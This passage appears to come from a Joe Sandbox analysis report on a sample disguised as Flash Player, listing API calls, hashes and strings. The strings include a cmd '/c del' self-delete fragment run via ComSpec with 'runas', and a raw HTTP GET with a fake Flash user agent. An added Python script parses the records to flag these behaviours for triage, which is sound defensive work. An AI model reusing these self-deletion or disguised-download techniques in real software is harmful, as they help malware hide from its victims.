• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID: CloseHandleTimerWaitable$CreateExitMutexReleaseThread
• String ID: Flash Player Seed/3.0$GET$HTTP/1.0
• API String ID: 268163532-3134777829
• Opcode ID: 029ae2429fc9dd902592dcee5e6d3885f43ee62063fc6640600a56909c5c7bc4
• Instruction ID: 6bb6e48fd43d3c9c6dc6c682f6b3f09e44401074883454f75edf52ce1de1fd64
• Opcode Fuzzy Hash: 029ae2429fc9dd902592dcee5e6d3885f43ee62063fc6640600a56909c5c7bc4
• Instruction Fuzzy Hash: 448126B1900209AFEB22DFA0CC85DAFBBB9FF46304F00852DF156A6591D7B4AE55CB50
APIs
• GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,00000000,00000000), ref: 003A204E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID: EnvironmentVariable
• String ID: " >> NUL$/c del "$ComSpec$open$runas
• API String ID: 1431749950-418080887
• Opcode ID: d893bbd0ebf872077adbffd6d0d0613b962aaea8b1d196eb0ebbeb2ac78ed6f7
• Instruction ID: e8286d2ea8f27060c491fda0f4558a21f5b348d4481bfff24f04c150dc4a5ea0
• Opcode Fuzzy Hash: d893bbd0ebf872077adbffd6d0d0613b962aaea8b1d196eb0ebbeb2ac78ed6f7
• Instruction Fuzzy Hash: 6B218E716201086FDB26EBA9DC52DEE7B6CEB1B300F000129F50ADA041EE605908CAA1
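The three records above for the ComSpec routine (ref 003A204E, strings `/c del "` and `" >> NUL`), the kernel32 export probe (ref 003A6D34, `IsWow64Process` / `GetSystemWow64DirectoryW`) and the waitable-timer loop (ref 003A4739, `GET`, `HTTP/1.0`, `Flash Player Seed/3.0`) are listed only as raw API and string IDs. The Python below is an added triage example, not part of the Joe Sandbox report or its IDA plugin: it parses records in the shape shown on this page and tags those three behaviours. The sample input is constructed from the values visible above; the parser, the rule names and the tagging logic are the editor's own assumptions, not anything the report itself derives.

```python
"""Triage the per-function API/string records of a Joe Sandbox IDA-plugin dump.

Added example: parser and rules are the editor's, not the report's. The sample
below is constructed from record shapes and values visible on this page.
"""
import re
from dataclasses import dataclass, field

# Constructed sample input in the report's record format.
SAMPLE_RECORDS = """\
APIs
• GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,00000000,00000000), ref: 003A204E
Similarity
• API ID: EnvironmentVariable
• String ID: " >> NUL$/c del "$ComSpec$open$runas
APIs
• GetModuleHandleW.KERNEL32(kernel32,00000000), ref: 003A6D34
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 003A6D4D
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003A6D6F
Similarity
• API ID: AddressProc$CurrentHandleModuleProcess
• String ID: GetSystemWow64DirectoryW$IsWow64Process$kernel32
APIs
• CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 003A4739
  • Part of subcall function 003A46F7: SetWaitableTimer.KERNEL32(?,?,00000000,003A46EB,?,00000000,?,?,?,003A4749), ref: 003A471D
• ExitThread.KERNEL32 ref: 003A49B0
Similarity
• API ID: CloseHandleTimerWaitable$CreateExitMutexReleaseThread
• String ID: Flash Player Seed/3.0$GET$HTTP/1.0
"""

# One API call line: optional "Part of subcall function XXXX:" prefix,
# Name.MODULE, optional (args), then "ref: ADDR". Args never contain ')'.
API_LINE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall: bool


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    api_ids: list = field(default_factory=list)
    strings: list = field(default_factory=list)

    @property
    def ref(self) -> str:
        # Address of the first listed call; used here to name the function.
        return self.apis[0].ref if self.apis else "?"


def parse_records(text: str) -> list:
    """Split the dump into one FunctionRecord per 'APIs' section."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            cur.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                    m.group("ref"), m.group("sub") is not None))
        elif line.startswith("• String ID:"):
            # The report joins strings with '$'; a literal '$' inside a string
            # is indistinguishable from the separator, so empty pieces are dropped.
            cur.strings = [s for s in line.split(":", 1)[1].strip().split("$") if s]
        elif line.startswith("• API ID:"):
            cur.api_ids = [s for s in line.split(":", 1)[1].strip().split("$") if s]
    return records


def classify(rec: FunctionRecord) -> list:
    """Behaviour tags for one function, in a fixed order."""
    tags = []
    names = {c.name for c in rec.apis}
    strs = set(rec.strings)
    resolved = {c.args[-1] for c in rec.apis if c.name == "GetProcAddress" and c.args}

    # 1. Self-delete: resolve %ComSpec%, then cmd.exe /c del "<own path>" >> NUL.
    if ("GetEnvironmentVariableW" in names and "ComSpec" in strs
            and any(s.startswith("/c del") for s in strs)):
        tags.append("self_delete_via_cmd")

    # 2. WOW64 probe through kernel32 exports resolved at run time, not imported.
    if {"IsWow64Process", "GetSystemWow64DirectoryW"} & (resolved | strs):
        tags.append("wow64_probe")

    # 3. Hand-built HTTP/1.0 GET with a Flash user-agent; no WinINet/WinHTTP call
    #    appears in the record, so the request is assembled as raw text.
    if {"GET", "HTTP/1.0"} <= strs and any(s.startswith("Flash Player") for s in strs):
        tags.append("raw_http_get_flash_ua")
    return tags


def triage(text: str) -> list:
    """(first-call address, tags) for every function that triggers a rule."""
    out = []
    for rec in parse_records(text):
        tags = classify(rec)
        if tags:
            out.append((rec.ref, tags))
    return out


if __name__ == "__main__":
    for ref, tags in triage(SAMPLE_RECORDS):
        print(ref, ", ".join(tags))
```

The rules key on the combination of a resolved API and the string set of the same function, not on either alone: `GetEnvironmentVariableW` by itself is benign, and `/c del` only becomes a self-delete indicator next to `ComSpec`. Run against the full report text, records whose string IDs were truncated to `$` (as in the first block above) produce no tags and are simply skipped.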
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,000001CC,CodeSignLogFile,CodeSignRootCert,000001CC,000001D0,000001D0,?,0000005C), ref: 003A5686
• GetFileSize.KERNEL32(00000000,00000000,mms.cfg,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?,00000000), ref: 003A56A7
• ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 003A56DA
• CloseHandle.KERNEL32(?,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?,00000000), ref: 003A5709
Strings
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID: File$CloseCreateHandleReadSize
• String ID: mms.cfg
• API String ID: 3919263394-2534990190
• Opcode ID: 111ceeddefc6f3ef191e01e29ec8fa5b867c8b0fc20962bdef4f8272863d7b38
                                                                                                                                                                                                                    • Instruction ID: 32353bf9d99cacf70ffad3f1f8f22ec852bdc0a48eb77ea275cb55fa4966cd72
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 111ceeddefc6f3ef191e01e29ec8fa5b867c8b0fc20962bdef4f8272863d7b38
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4621C031940614ABCB23AFA8DC88BDEBBACEF47B50F111154F855AB1A0DBB18944C660
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C), ref: 003A279B
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C,Macromed), ref: 003A27C3
                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash), ref: 003A27D4
                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C), ref: 003A2809
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C), ref: 003A2813
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Local$AllocCloseCurrentErrorFreeHandleLastProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1388692885-0
                                                                                                                                                                                                                    • Opcode ID: d302cac3edaf8dad36a462cf87b6be251e12c5c0b2867f0d919249fa32f6cb9b
                                                                                                                                                                                                                    • Instruction ID: e26a3a0164f926a0c26ed6576473afae5209a261e3fec134c02b948bcaadf40f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d302cac3edaf8dad36a462cf87b6be251e12c5c0b2867f0d919249fa32f6cb9b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96111C75940209EFDF22ABA4DC09BEFBB7DEF06741F154460F901A61A1DB349A05EB60